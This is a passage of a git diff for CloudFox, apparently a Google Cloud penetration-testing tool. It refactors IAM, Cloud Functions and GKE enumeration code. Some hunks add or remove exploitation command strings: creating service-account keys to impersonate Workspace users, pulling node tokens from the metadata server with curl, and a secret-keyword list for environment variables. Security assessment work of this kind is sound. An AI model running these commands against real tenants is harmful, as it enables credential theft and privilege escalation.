Count user-managed keys (not system-managed) - userKeyCount := 0 + // Collect user-managed keys (not system-managed) for _, key := range keysResp.Keys { if key.KeyType == "USER_MANAGED" { - userKeyCount++ + // Extract key ID from full name (projects/.../keys/KEY_ID) + keyID := key.Name + if parts := strings.Split(key.Name, "/"); len(parts) > 0 { + keyID = parts[len(parts)-1] + } + account.Keys = append(account.Keys, KeyInfo{ + KeyID: keyID, + CreatedAt: key.ValidAfterTime, + ExpiresAt: key.ValidBeforeTime, + KeyAlgorithm: key.KeyAlgorithm, + KeyType: key.KeyType, + }) } } - account.HasKeys = userKeyCount > 0 - account.KeyCount = userKeyCount } // Analyze risk @@ -146,12 +163,13 @@ func (s *DomainWideDelegationService) analyzeRisk(account DWDServiceAccount) (st score += 3 } - if account.HasKeys { - reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", account.KeyCount)) + hasKeys := len(account.Keys) > 0 + if hasKeys { + reasons = append(reasons, fmt.Sprintf("Has %d user-managed key(s) - can be used for impersonation", len(account.Keys))) score += 2 } - if account.DWDEnabled && account.HasKeys { + if account.DWDEnabled && hasKeys { reasons = append(reasons, "CRITICAL: DWD enabled + keys exist = can impersonate any Workspace user!") score += 2 } @@ -196,9 +214,9 @@ func (s *DomainWideDelegationService) generateExploitCommands(account DWDService "", ) - if account.HasKeys { + if len(account.Keys) > 0 { commands = append(commands, - "# Download existing key (if you have iam.serviceAccountKeys.create permission):", + "# Create a new key (if you have iam.serviceAccountKeys.create permission):", fmt.Sprintf("gcloud iam service-accounts keys create /tmp/key.json --iam-account=%s", account.Email), "", ) diff --git a/gcp/services/functionsService/functionsService.go b/gcp/services/functionsService/functionsService.go index 3f35499e..98329358 100644 --- a/gcp/services/functionsService/functionsService.go +++ b/gcp/services/functionsService/functionsService.go @@ -58,8 +58,8 @@ type FunctionInfo struct { SecretVolumeCount int // IAM (if retrieved) - InvokerMembers []string // Who can invoke this function - IsPublic bool // allUsers or allAuthenticatedUsers can invoke + IAMBindings []IAMBinding // All IAM bindings for this function + IsPublic bool // allUsers or allAuthenticatedUsers can invoke // Pentest-specific fields EnvVarNames []string // Names of env vars (may hint at secrets) @@ -67,24 +67,12 @@ type FunctionInfo struct { SecretVolumeNames []string // Names of secret volumes SourceLocation string // GCS or repo source location SourceType string // GCS, Repository - RiskLevel string // CRITICAL, HIGH, MEDIUM, LOW - RiskReasons []string // Why it's risky - - // Cold start analysis - ColdStartRisk string // HIGH, MEDIUM, LOW based on min instances } -// FunctionSecurityAnalysis contains detailed security analysis for a function -type FunctionSecurityAnalysis struct { - FunctionName string `json:"functionName"` - ProjectID string `json:"projectId"` - Region string `json:"region"` - ServiceAccount string `json:"serviceAccount"` - IsPublic bool `json:"isPublic"` - TriggerURL string `json:"triggerURL"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - ExploitCommands []string `json:"exploitCommands"` +// IAMBinding represents a single IAM role binding +type IAMBinding struct { + Role string + Member string } // Functions retrieves all Cloud Functions in a project across all regions @@ -109,7 +97,7 @@ func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) // Try to get IAM policy iamPolicy, iamErr := fs.getFunctionIAMPolicy(service, fn.Name) if iamErr == nil && iamPolicy != nil { - info.InvokerMembers, info.IsPublic = parseInvokerBindings(iamPolicy) + info.IAMBindings, info.IsPublic = parseIAMBindings(iamPolicy) } functions = append(functions, info) @@ -127,10 +115,9 @@ func (fs *FunctionsService) Functions(projectID string) ([]FunctionInfo, error) // parseFunctionInfo extracts relevant information from a Cloud Function func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionInfo { info := FunctionInfo{ - Name: extractFunctionName(fn.Name), - ProjectID: projectID, - State: fn.State, - RiskReasons: []string{}, + Name: extractFunctionName(fn.Name), + ProjectID: projectID, + State: fn.State, } // Extract region from function name @@ -191,15 +178,6 @@ func parseFunctionInfo(fn *cloudfunctions.Function, projectID string) FunctionIn info.MinInstanceCount = fn.ServiceConfig.MinInstanceCount info.MaxInstanceRequestConcurrency = fn.ServiceConfig.MaxInstanceRequestConcurrency - // Cold start risk analysis - if info.MinInstanceCount > 0 { - info.ColdStartRisk = "LOW" - } else if info.MaxInstanceCount > 100 { - info.ColdStartRisk = "MEDIUM" - } else { - info.ColdStartRisk = "HIGH" - } - // Extract environment variable names (pentest-relevant - may hint at secrets) if fn.ServiceConfig.EnvironmentVariables != nil { info.EnvVarCount = len(fn.ServiceConfig.EnvironmentVariables) @@ -262,27 +240,28 @@ func (fs *FunctionsService) getFunctionIAMPolicy(service *cloudfunctions.Service return policy, nil } -// parseInvokerBindings extracts who can invoke the function and checks for public access -func parseInvokerBindings(policy *cloudfunctions.Policy) ([]string, bool) { - var invokers []string +// parseIAMBindings extracts all IAM bindings and checks for public access +func parseIAMBindings(policy *cloudfunctions.Policy) ([]IAMBinding, bool) { + var bindings []IAMBinding isPublic := false for _, binding := range policy.Bindings { - // Check for invoker roles - if binding.Role == "roles/cloudfunctions.invoker" || - binding.Role == "roles/run.invoker" { - invokers = append(invokers, binding.Members...) - - // Check for public access - for _, member := range binding.Members { - if member == "allUsers" || member == "allAuthenticatedUsers" { - isPublic = true - } + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on invoker roles + if (binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker") && + (member == "allUsers" || member == "allAuthenticatedUsers") { + isPublic = true } } } - return invokers, isPublic + return bindings, isPublic } // extractFunctionName extracts just the function name from the full resource name @@ -294,132 +273,6 @@ func extractFunctionName(fullName string) string { return fullName } -// AnalyzeFunctionSecurity performs security analysis on a function -func (fs *FunctionsService) AnalyzeFunctionSecurity(fn FunctionInfo) FunctionSecurityAnalysis { - analysis := FunctionSecurityAnalysis{ - FunctionName: fn.Name, - ProjectID: fn.ProjectID, - Region: fn.Region, - ServiceAccount: fn.ServiceAccount, - IsPublic: fn.IsPublic, - TriggerURL: fn.TriggerURL, - RiskReasons: []string{}, - ExploitCommands: []string{}, - } - - score := 0 - - // Check for public access (CRITICAL) - if fn.IsPublic { - analysis.RiskReasons = append(analysis.RiskReasons, - "Function is publicly accessible (allUsers/allAuthenticatedUsers)") - if fn.TriggerURL != "" { - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# PUBLIC function - direct access:\ncurl -s '%s'", fn.TriggerURL)) - } - score += 3 - } - - // Check ingress settings - if fn.IngressSettings == "ALLOW_ALL" || fn.IngressSettings == "ALL_TRAFFIC" { - analysis.RiskReasons = append(analysis.RiskReasons, - "Function allows all ingress traffic") - score += 1 - } - - // Check for default service account (often over-privileged) - if strings.Contains(fn.ServiceAccount, "-compute@developer.gserviceaccount.com") || - strings.Contains(fn.ServiceAccount, "@appspot.gserviceaccount.com") { - analysis.RiskReasons = append(analysis.RiskReasons, - "Uses default service account (often has excessive permissions)") - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Check default SA permissions:\ngcloud projects get-iam-policy %s --flatten='bindings[].members' --filter='bindings.members:%s'", - fn.ProjectID, fn.ServiceAccount)) - score += 2 - } - - // Check for secrets (potential for exfiltration if function is compromised) - if fn.SecretEnvVarCount > 0 || fn.SecretVolumeCount > 0 { - analysis.RiskReasons = append(analysis.RiskReasons, - fmt.Sprintf("Function has access to %d secret env vars and %d secret volumes", - fn.SecretEnvVarCount, fn.SecretVolumeCount)) - score += 1 - } - - // Check for sensitive env var names - sensitiveVars := []string{} - for _, varName := range fn.EnvVarNames { - if containsSensitiveKeyword(varName) { - sensitiveVars = append(sensitiveVars, varName) - } - } - if len(sensitiveVars) > 0 { - analysis.RiskReasons = append(analysis.RiskReasons, - fmt.Sprintf("Environment variables with sensitive names: %s", strings.Join(sensitiveVars, ", "))) - score += 1 - } - - // Check VPC connector (lateral movement potential) - if fn.VPCConnector != "" { - analysis.RiskReasons = append(analysis.RiskReasons, - fmt.Sprintf("Function has VPC connector: %s (lateral movement potential)", fn.VPCConnector)) - score += 1 - } - - // Source code access - if fn.SourceLocation != "" && fn.SourceType == "GCS" { - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Download function source code:\ngsutil cp %s ./function-source.zip && unzip function-source.zip", - fn.SourceLocation)) - } - - // Add general enumeration commands - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Get function details:\ngcloud functions describe %s --region=%s --project=%s --gen2", - fn.Name, fn.Region, fn.ProjectID)) - - if fn.TriggerType == "HTTP" && fn.TriggerURL != "" { - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Invoke function with auth:\ncurl -s -X POST '%s' -H 'Authorization: Bearer $(gcloud auth print-identity-token)' -H 'Content-Type: application/json' -d '{}'", - fn.TriggerURL)) - } - - // Determine risk level - if score >= 4 { - analysis.RiskLevel = "CRITICAL" - } else if score >= 3 { - analysis.RiskLevel = "HIGH" - } else if score >= 2 { - analysis.RiskLevel = "MEDIUM" - } else if score >= 1 { - analysis.RiskLevel = "LOW" - } else { - analysis.RiskLevel = "INFO" - } - - return analysis -} - -// containsSensitiveKeyword checks if a variable name might contain secrets -func containsSensitiveKeyword(name string) bool { - sensitiveKeywords := []string{ - "SECRET", "PASSWORD", "PASSWD", "PWD", - "TOKEN", "KEY", "CREDENTIAL", "CRED", - "AUTH", "API_KEY", "APIKEY", "PRIVATE", - "DATABASE", "DB_PASS", "MONGO", "MYSQL", - "POSTGRES", "REDIS", "WEBHOOK", "SLACK", - "SENDGRID", "STRIPE", "AWS", "AZURE", - } - - upperName := strings.ToUpper(name) - for _, keyword := range sensitiveKeywords { - if strings.Contains(upperName, keyword) { - return true - } - } - return false -} - // parseMemoryMB parses a memory string like "256M" or "1G" to MB func parseMemoryMB(memStr string) (int64, error) { memStr = strings.TrimSpace(memStr) diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go index 813b4085..28a336f3 100644 --- a/gcp/services/gkeService/gkeService.go +++ b/gcp/services/gkeService/gkeService.go @@ -106,18 +106,6 @@ type NodePoolInfo struct { RiskyScopes []string // Scopes that enable attacks } -// ClusterSecurityAnalysis contains detailed security analysis for a cluster -type ClusterSecurityAnalysis struct { - ClusterName string `json:"clusterName"` - ProjectID string `json:"projectId"` - Location string `json:"location"` - RiskLevel string `json:"riskLevel"` - RiskReasons []string `json:"riskReasons"` - AttackSurface []string `json:"attackSurface"` - PrivescPaths []string `json:"privescPaths"` - ExploitCommands []string `json:"exploitCommands"` -} - // Clusters retrieves all GKE clusters in a project func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { ctx := context.Background() @@ -403,113 +391,3 @@ func identifySecurityIssues(cluster ClusterInfo) []string { return issues } -// AnalyzeClusterSecurity performs detailed security analysis on a cluster -func (gs *GKEService) AnalyzeClusterSecurity(cluster ClusterInfo, nodePools []NodePoolInfo) ClusterSecurityAnalysis { - analysis := ClusterSecurityAnalysis{ - ClusterName: cluster.Name, - ProjectID: cluster.ProjectID, - Location: cluster.Location, - RiskReasons: []string{}, - AttackSurface: []string{}, - PrivescPaths: []string{}, - ExploitCommands: []string{}, - } - - score := 0 - - // Analyze attack surface - if !cluster.PrivateCluster { - analysis.AttackSurface = append(analysis.AttackSurface, "Public cluster endpoint") - if !cluster.MasterAuthorizedOnly { - analysis.AttackSurface = append(analysis.AttackSurface, "No master authorized networks") - analysis.RiskReasons = append(analysis.RiskReasons, "Public endpoint accessible from any IP") - score += 3 - } - } - - if cluster.LegacyABAC { - analysis.AttackSurface = append(analysis.AttackSurface, "Legacy ABAC enabled") - analysis.RiskReasons = append(analysis.RiskReasons, "Legacy ABAC can be exploited for privilege escalation") - score += 2 - } - - if cluster.BasicAuthEnabled { - analysis.AttackSurface = append(analysis.AttackSurface, "Basic auth enabled") - analysis.RiskReasons = append(analysis.RiskReasons, "Basic auth credentials may be leaked") - score += 2 - } - - // Analyze privilege escalation paths - if cluster.WorkloadIdentity == "" { - analysis.PrivescPaths = append(analysis.PrivescPaths, - "No Workload Identity - pods can access node SA via metadata") - analysis.RiskReasons = append(analysis.RiskReasons, "Metadata server accessible from pods") - score += 2 - } - - // Analyze node pools for risky configurations - for _, np := range nodePools { - if np.ClusterName != cluster.Name { - continue - } - - if np.HasCloudPlatformScope { - analysis.PrivescPaths = append(analysis.PrivescPaths, - fmt.Sprintf("Node pool %s has cloud-platform scope - full GCP access from pods", np.Name)) - analysis.RiskReasons = append(analysis.RiskReasons, - fmt.Sprintf("Node pool %s: cloud-platform scope enables full GCP access", np.Name)) - score += 3 - } - - if strings.HasSuffix(np.ServiceAccount, "-compute@developer.gserviceaccount.com") || - np.ServiceAccount == "default" { - analysis.PrivescPaths = append(analysis.PrivescPaths, - fmt.Sprintf("Node pool %s uses default SA (often has broad permissions)", np.Name)) - score += 1 - } - } - - if !cluster.NetworkPolicy { - analysis.AttackSurface = append(analysis.AttackSurface, "No network policy - pods can communicate freely") - score += 1 - } - - // Generate exploitation commands - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# Get cluster credentials:\ngcloud container clusters get-credentials %s --zone=%s --project=%s", - cluster.Name, cluster.Location, cluster.ProjectID)) - - if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { - analysis.ExploitCommands = append(analysis.ExploitCommands, - "# Cluster API is publicly accessible, attempt kubectl commands") - } - - if cluster.WorkloadIdentity == "" { - analysis.ExploitCommands = append(analysis.ExploitCommands, - "# No Workload Identity - access metadata from pod:\n# curl -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token") - } - - // Check for node pools with cloud-platform scope - for _, np := range nodePools { - if np.ClusterName == cluster.Name && np.HasCloudPlatformScope { - analysis.ExploitCommands = append(analysis.ExploitCommands, - fmt.Sprintf("# From pod on node pool %s, access any GCP API:\n# TOKEN=$(curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token | jq -r .access_token)\n# curl -H \"Authorization: Bearer $TOKEN\" https://www.googleapis.com/storage/v1/b?project=%s", - np.Name, cluster.ProjectID)) - } - } - - // Determine risk level - if score >= 6 { - analysis.RiskLevel = "CRITICAL" - } else if score >= 4 { - analysis.RiskLevel = "HIGH" - } else if score >= 2 { - analysis.RiskLevel = "MEDIUM" - } else if score >= 1 { - analysis.RiskLevel = "LOW" - } else { - analysis.RiskLevel = "INFO" - } - - return analysis -} diff --git a/gcp/services/iamService/iamService.go b/gcp/services/iamService/iamService.go index 4b12f910..a3d222c1 100644 --- a/gcp/services/iamService/iamService.go +++ b/gcp/services/iamService/iamService.go @@ -8,12 +8,14 @@ import ( iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" + resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" cloudidentity "google.golang.org/api/cloudidentity/v1" crmv1 "google.golang.org/api/cloudresourcemanager/v1" iam "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" "google.golang.org/api/option" ) @@ -568,8 +570,26 @@ func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, return allBindings, nil } +// policyCache caches successful policy lookups per resource +var policyCache = make(map[string][]PolicyBinding) + +// policyFailureCache tracks resources we've already failed to get policies for +var policyFailureCache = make(map[string]bool) + // getPoliciesForResource fetches policies for a specific resource using the appropriate client func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + cacheKey := resourceType + "/" + resourceID + + // Check success cache first + if bindings, ok := policyCache[cacheKey]; ok { + return bindings, nil + } + + // Check failure cache - return permission denied without logging again + if policyFailureCache[cacheKey] { + return nil, gcpinternal.ErrPermissionDenied + } + var resourceName string switch resourceType { @@ -591,7 +611,9 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil case "folder": var client *resourcemanager.FoldersClient @@ -602,6 +624,7 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri client, err = resourcemanager.NewFoldersClient(ctx) } if err != nil { + policyFailureCache[cacheKey] = true return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -609,9 +632,12 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri resourceName = "folders/" + resourceID policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) if err != nil { + policyFailureCache[cacheKey] = true return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil case "organization": var client *resourcemanager.OrganizationsClient @@ -622,6 +648,7 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri client, err = resourcemanager.NewOrganizationsClient(ctx) } if err != nil { + policyFailureCache[cacheKey] = true return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -629,9 +656,12 @@ func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID stri resourceName = "organizations/" + resourceID policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) if err != nil { + policyFailureCache[cacheKey] = true return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + bindings := convertPolicyToBindings(policy, resourceID, resourceType, resourceName) + policyCache[cacheKey] = bindings + return bindings, nil default: return nil, fmt.Errorf("unsupported resource type: %s", resourceType) @@ -813,6 +843,9 @@ type EntityPermissions struct { // RolePermissions caches role to permissions mapping var rolePermissionsCache = make(map[string][]string) +// rolePermissionsFailureCache tracks roles we've already failed to look up (to avoid duplicate error logs) +var rolePermissionsFailureCache = make(map[string]bool) + // GetRolePermissions retrieves the permissions for a given role func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { // Check cache first @@ -820,6 +853,11 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ return perms, nil } + // Check if we've already failed to look up this role + if rolePermissionsFailureCache[roleName] { + return nil, gcpinternal.ErrPermissionDenied + } + var iamService *iam.Service var err error if s.session != nil { @@ -852,6 +890,8 @@ func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([ // Organization-level custom role role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() if err != nil { + // Cache the failure to avoid repeated error logs + rolePermissionsFailureCache[roleName] = true return nil, gcpinternal.ParseGCPError(err, "iam.googleapis.com") } permissions = role.IncludedPermissions @@ -1439,3 +1479,387 @@ func calculateSAImpersonationRisk(info *SAImpersonationInfo) (string, []string) } return "INFO", reasons } + +// ============================================================================ +// Organization and Folder IAM Enumeration +// ============================================================================ + +// ScopeBinding represents an IAM binding with full scope information +type ScopeBinding struct { + ScopeType string `json:"scopeType"` // organization, folder, project + ScopeID string `json:"scopeId"` // The ID of the scope + ScopeName string `json:"scopeName"` // Display name of the scope + Member string `json:"member"` // Full member identifier + MemberType string `json:"memberType"` // User, ServiceAccount, Group, etc. + MemberEmail string `json:"memberEmail"` // Clean email + Role string `json:"role"` + IsCustom bool `json:"isCustom"` + HasCondition bool `json:"hasCondition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` +} + +// OrgFolderIAMData holds IAM bindings from organizations and folders +type OrgFolderIAMData struct { + Organizations []ScopeBinding `json:"organizations"` + Folders []ScopeBinding `json:"folders"` + OrgNames map[string]string `json:"orgNames"` // orgID -> displayName + FolderNames map[string]string `json:"folderNames"` // folderID -> displayName +} + +// GetOrganizationIAM gets IAM bindings for all accessible organizations +func (s *IAMService) GetOrganizationIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + orgNames := make(map[string]string) + + // First, search for accessible organizations + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for organization search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search organizations") + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "organization", + ScopeID: orgID, + ScopeName: org.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, orgNames, nil +} + +// GetFolderIAM gets IAM bindings for all accessible folders +func (s *IAMService) GetFolderIAM(ctx context.Context) ([]ScopeBinding, map[string]string, error) { + var bindings []ScopeBinding + folderNames := make(map[string]string) + + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Search for all folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + // Log the error - likely permission denied for folder search + parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_IAM_MODULE_NAME, "Could not search folders") + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Convert policy to scope bindings + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + sb := ScopeBinding{ + ScopeType: "folder", + ScopeID: folderID, + ScopeName: folder.DisplayName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: binding.Role, + IsCustom: isCustomRole(binding.Role), + } + if binding.Condition != nil { + sb.HasCondition = true + sb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + bindings = append(bindings, sb) + } + } + } + + return bindings, folderNames, nil +} + +// GetAllScopeIAM gets IAM bindings from organizations, folders, and projects +func (s *IAMService) GetAllScopeIAM(ctx context.Context, projectIDs []string, projectNames map[string]string) ([]ScopeBinding, error) { + var allBindings []ScopeBinding + + // Get organization IAM + orgBindings, _, err := s.GetOrganizationIAM(ctx) + if err != nil { + // Log but continue - we might not have org access + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate organization IAM") + } else { + allBindings = append(allBindings, orgBindings...) + } + + // Get folder IAM + folderBindings, _, err := s.GetFolderIAM(ctx) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, "Could not enumerate folder IAM") + } else { + allBindings = append(allBindings, folderBindings...) + } + + // Get project IAM for each project + for _, projectID := range projectIDs { + projectBindings, err := s.Policies(projectID, "project") + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_IAM_MODULE_NAME, + fmt.Sprintf("Could not enumerate IAM for project %s", projectID)) + continue + } + + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + for _, pb := range projectBindings { + for _, member := range pb.Members { + sb := ScopeBinding{ + ScopeType: "project", + ScopeID: projectID, + ScopeName: projectName, + Member: member, + MemberType: determinePrincipalType(member), + MemberEmail: extractEmail(member), + Role: pb.Role, + IsCustom: isCustomRole(pb.Role), + } + if pb.HasCondition && pb.ConditionInfo != nil { + sb.HasCondition = true + sb.ConditionInfo = pb.ConditionInfo + } + allBindings = append(allBindings, sb) + } + } + } + + return allBindings, nil +} + +// ============================================================================ +// MFA Status Lookup via Cloud Identity API +// ============================================================================ + +// MFAStatus represents the MFA status for a user +type MFAStatus struct { + Email string `json:"email"` + HasMFA bool `json:"hasMfa"` + MFAType string `json:"mfaType"` // 2SV method type + Enrolled bool `json:"enrolled"` // Whether 2SV is enrolled + Enforced bool `json:"enforced"` // Whether 2SV is enforced by policy + LastUpdate string `json:"lastUpdate"` + Error string `json:"error"` // Error message if lookup failed +} + +// GetUserMFAStatus attempts to get MFA status for a user via Cloud Identity API +// This requires cloudidentity.users.get or admin.directory.users.get permission +func (s *IAMService) GetUserMFAStatus(ctx context.Context, email string) (*MFAStatus, error) { + status := &MFAStatus{ + Email: email, + } + + // Cloud Identity doesn't directly expose 2SV status + // We need to use the Admin SDK Directory API which requires admin privileges + // For now, we'll attempt to look up the user and note if we can't + + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + status.Error = "Cloud Identity API not accessible" + return status, nil + } + + // Try to look up the user - this gives us some info but not 2SV status directly + // The Admin SDK would be needed for full 2SV info + lookupReq := ciService.Groups.Lookup() + // We can't directly query user 2SV via Cloud Identity + // This would require Admin SDK with admin.directory.users.get + _ = lookupReq + + status.Error = "2SV status requires Admin SDK access" + return status, nil +} + +// GetBulkMFAStatus attempts to get MFA status for multiple users +// Returns a map of email -> MFAStatus +func (s *IAMService) GetBulkMFAStatus(ctx context.Context, emails []string) map[string]*MFAStatus { + results := make(map[string]*MFAStatus) + + for _, email := range emails { + // Skip non-user emails (service accounts, groups, etc.) + if strings.HasSuffix(email, ".iam.gserviceaccount.com") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A (service account)", + } + continue + } + if strings.Contains(email, "group") || !strings.Contains(email, "@") { + results[email] = &MFAStatus{ + Email: email, + Error: "N/A", + } + continue + } + + status, _ := s.GetUserMFAStatus(ctx, email) + results[email] = status + } + + return results +} + +// ============================================================================ +// Enhanced Combined IAM with All Scopes +// ============================================================================ + +// EnhancedIAMData holds comprehensive IAM data including org/folder bindings +type EnhancedIAMData struct { + ScopeBindings []ScopeBinding `json:"scopeBindings"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + MFAStatus map[string]*MFAStatus `json:"mfaStatus"` +} + +// CombinedIAMEnhanced retrieves all IAM-related data including org/folder bindings +func (s *IAMService) CombinedIAMEnhanced(ctx context.Context, projectIDs []string, projectNames map[string]string) (EnhancedIAMData, error) { + var data EnhancedIAMData + data.MFAStatus = make(map[string]*MFAStatus) + + // Get all scope bindings (org, folder, project) + scopeBindings, err := s.GetAllScopeIAM(ctx, projectIDs, projectNames) + if err != nil { + return data, fmt.Errorf("failed to get scope bindings: %v", err) + } + data.ScopeBindings = scopeBindings + + // Collect unique user emails for MFA lookup + userEmails := make(map[string]bool) + for _, sb := range scopeBindings { + if sb.MemberType == "User" { + userEmails[sb.MemberEmail] = true + } + } + + // Get MFA status for users (best effort) + var emailList []string + for email := range userEmails { + emailList = append(emailList, email) + } + data.MFAStatus = s.GetBulkMFAStatus(ctx, emailList) + + // Get service accounts and custom roles for each project + for _, projectID := range projectIDs { + // Service accounts + serviceAccounts, err := s.ServiceAccounts(projectID) + if err == nil { + data.ServiceAccounts = append(data.ServiceAccounts, serviceAccounts...) + } + + // Custom roles + customRoles, err := s.CustomRoles(projectID) + if err == nil { + data.CustomRoles = append(data.CustomRoles, customRoles...) + } + } + + // Extract groups from scope bindings + groupMap := make(map[string]*GroupInfo) + for _, sb := range scopeBindings { + if sb.MemberType == "Group" { + if _, exists := groupMap[sb.MemberEmail]; !exists { + groupMap[sb.MemberEmail] = &GroupInfo{ + Email: sb.MemberEmail, + ProjectID: sb.ScopeID, // Use first scope where seen + Roles: []string{}, + } + } + groupMap[sb.MemberEmail].Roles = append(groupMap[sb.MemberEmail].Roles, sb.Role) + } + } + for _, g := range groupMap { + data.Groups = append(data.Groups, *g) + } + + return data, nil +} diff --git a/gcp/services/iapService/iapService.go b/gcp/services/iapService/iapService.go index 10492a82..e235cb94 100644 --- a/gcp/services/iapService/iapService.go +++ b/gcp/services/iapService/iapService.go @@ -34,29 +34,22 @@ type 